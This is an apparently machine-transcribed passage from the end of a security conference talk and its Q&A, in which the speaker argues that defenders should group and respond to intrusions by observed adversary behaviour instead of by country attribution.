because there's no going to be no one size fits all to a lot of this activity if you don't work to relate this specifically to your environment and needs you're doing something wrong so you want to make sure that you align those observations and coming up with defensive planning to your needs and your network so characterize the activities you observe them group them into you know holes that make sense you know entities that make sense and orient to the targets and perceived interests for your organization and for your perceived adversary and then based upon all that you can then define a group around the characteristics you've observed you'd focus on that observable behavior and build your detection and defenses

around that and now you've derived it in my opinion a much more robust way of identifying tracking and defending against malicious activity so that's all i've got and i've got a lot of time left so questions comments rotten fruit yes

okay sometimes isn't it true that sometimes the country attribution is important from a political standpoint you get people to act on the indication of compromise to get them to look for those because

potentially so the question for those who couldn't hear like sometimes is it important to have this attribution by country perspective because if you don't tell someone that hey the russians are in your network they're gonna blow it off like i don't care we have intrusions all the time uh i would say that might very well be true but i would say that perspective is terrible um so the way that i would look at it is if you're defending a network you know first off going back to the silly prussian king example earlier is you're never going to defend everything all the time so you have to accept and anticipate you're going to get compromised you can't just defeat everything on the

front door but you really should be approaching this from a hey if someone you know you staying within my realm breaks into my uh process control network for an electric utility i don't care who the hell it is that bothers me it could be the russians it could be the botswanans it could be whoever i need to start reacting so i think it's intellectual laziness on the part of defenders uh information security to make the assumption that it's like uh it's crimeware or whatever who cares well like there hasn't been the case of certain actors behind large crimeware campaigns who also you know moonlight doing things like shooting zeus out there and their day job happens to be working in an office

building in st petersburg with people with guns in it and whatnot um you know so really it's it goes back to that idea of a cognitive bias that we're setting up that just because of who's involved that i either should care shouldn't care or here's how they'll operate um i think that some people might use that as a way of triaging that it's like oh it's just some script kitties in eastern europe or whatever i don't care they can mine some bitcoins and i'll kick them out uh but that's the wrong way of approaching it because that goes back to the who i'm assuming is in my network versus how they're acting which is the whole point

of this or whatever is like instead of going for who you think it is go for how they're acting and base your response off of that is that helpful okay yes

uh for nations for like assigned to nation states

so the value in my opinion it's here

yeah no so from that this is why so really the way that i'm looking at this is you know daimler is a placeholder it's really just a signifier for something else could be anything could be martians for all i care but it's a collection of observables that i get an idea for okay when i see daimloy i know that i'm going to you'll probably see unless they're changed and thus have shifted into something completely new uh commodity like malware the use of phishing for credential capture rdp for initial access with an ultimate goal for data capture and further pivoting within the network it gives me an idea for how does this intrusion activity look like

in order to do things like you know the playbook example like all right if i see this collection of activities or some of these like these are the follow-on questions that i should be asking as a way to focus my investigation and my response it also lets me from a targeting perspective and going to that intelligence aspect like all right i know that this thing i'll call dimeloy happens to be really interested in these industrial verticals i'm part of this industrial vertical i better make sure that i'm paying attention to how these guys operate even if i don't want to maybe prioritize resources on browser-based cryptocurrency mining so does that help okay all right i've given you five minutes back

thank you everyone